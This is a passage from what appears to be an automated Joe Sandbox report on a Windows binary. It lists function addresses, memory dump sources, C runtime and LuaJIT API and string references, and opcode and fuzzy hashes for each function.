                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5322CE76608B8685D770CB19E0803AEB7A0F7D9BA4F50412AEA9D87BA4DF7CD454CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE47E430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 62COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID: C$I$J$N
                                                                                                                                                                                                                              • API String ID: 3168844106-327184588
                                                                                                                                                                                                                              • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                                                                              • Instruction ID: 56cf3d408a0c51fd0385db04345ae1c5a4825c4ff3e24e12e076c3ebe672ac29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC310F7291D7818AD760DB16E04422EBBA0F798B68F00122AF79E83B98CF7CD5558F44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51FCD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: "$cosh
                                                                                                                                                                                                                              • API String ID: 1156100317-3800341493
                                                                                                                                                                                                                              • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                                                                              • Instruction ID: 682afc1c6eec698d1201422f9bc49c38b55c1e59f13262705fde609f16f0cf28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94819821E28F8988D6638B34A4613BA7354BF7A3D5F11D337F54E71A51DF6EA0A38600
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE500978 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 851805269-3733052814
                                                                                                                                                                                                                              • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                                                                              • Instruction ID: cf4d7faee72d3b9580eb4f027c579d2097be3463d91ebe970ea1fc839e17a08b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4616E3290864A8AEB648B12956037C77A0EB64BDCF184637FA9D87795CF3DE4B1C701
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE482AA0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: type_info::_name_internal_method
                                                                                                                                                                                                                              • String ID: builtin#$false$nil$true
                                                                                                                                                                                                                              • API String ID: 3713626258-3570738779
                                                                                                                                                                                                                              • Opcode ID: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                                                                                                                                                                                              • Instruction ID: 97809ee71d1c9f718c621a2730186790011c05b7f9c2a9a6d0db3c41c3a7adbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA61FD26A1CA4686EA609B19E49012E77A0FB98BE4F505333FA9DC77E4CF3CD1508B44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE49B290 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                                                                                                                                                                                              • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                                                                                                                                                                                              • API String ID: 1341846612-1452030528
                                                                                                                                                                                                                              • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                                                                              • Instruction ID: 2e01b3229264edde3b4ae648d3ac349100937147b9e7a0739d8a16c992977cbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC316421A2C94741E661E761E9653BE6350EFE57C4F40003BF94EC66DAEE2DE5208740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE499610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock_mbsncpy_s
                                                                                                                                                                                                                              • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                                                                                                                                                                                              • API String ID: 1937151238-4005544233
                                                                                                                                                                                                                              • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                                                                              • Instruction ID: f92dbe9011c41679b295fec4e06571a2768e228e00ee9377bc079da913c804e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53215161518A8281D620AB65E9501BFA360FBD47B4F401337FAADC7BD9CEBCD810CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51AD68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                                                                              • Instruction ID: 90ae77b610f8cbfb8cd1d07827da7a3163cb23b63c3921e61b08512c925b1728
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF03A61A19A4A82EB554B50E4A437C3360AFA87C1F44103BF55F86669CF2EE4B8C310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52CDE4 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DE52CE26
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6DE52CDA3,?,?,FFFFFFFE,00007FF6DE52D196), ref: 00007FF6DE52CEE4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6DE52CDA3,?,?,FFFFFFFE,00007FF6DE52D196), ref: 00007FF6DE52CF6E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2210144848-0
                                                                                                                                                                                                                              • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                                                                                                                                                                                              • Instruction ID: d1d83279c068182a1bbe282378167c83520ffb8f3ae7985c3dfbb927e52e8727
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D481B422E1965A89F7619B6588602BC2761BB74BC4F440137FE0ED7792DF3FA461C310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52FCD8 Relevance: 7.7, APIs: 5, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                                                                              • Instruction ID: 16fd7062a5715a5a2208ef0b442ae2ff10712a3ae79d95b5025f9ebcee36d51c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F651D41A908D8EC6E6769E34B82037E6250BF713D4F048237F94EB66D5DF3EA4618610
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52F880 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                                                                              • Instruction ID: e312905c5c22b0fe8a248e8e3e4e194bef9c72be7810b5c582d88e654c5b59c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4118F2EE18A0F85F7781124F57237D11416F783F4F080637FA6EAA3D6DE1EA8A18120
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE498A50 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 667068680-0
                                                                                                                                                                                                                              • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                                                                              • Instruction ID: aa2d33464cf39f959562a57c13094eeac4996c28a2369d3bc203ce6fe2650429
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A101D732908A8682DB609B15F99432E67B0FB9C7D4F14413BEA8D96A78CF3DD564CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52D7F8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                                                                              • Instruction ID: 60938da14ca31871ccc3c8fd85777c59d716ac27c9e6c534bcdb541057b4a43d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F819172D0E24BC5F7754A2882B467C2B909F727C8F555037FA0EC65D5CE2FA8219702
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE505C3C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
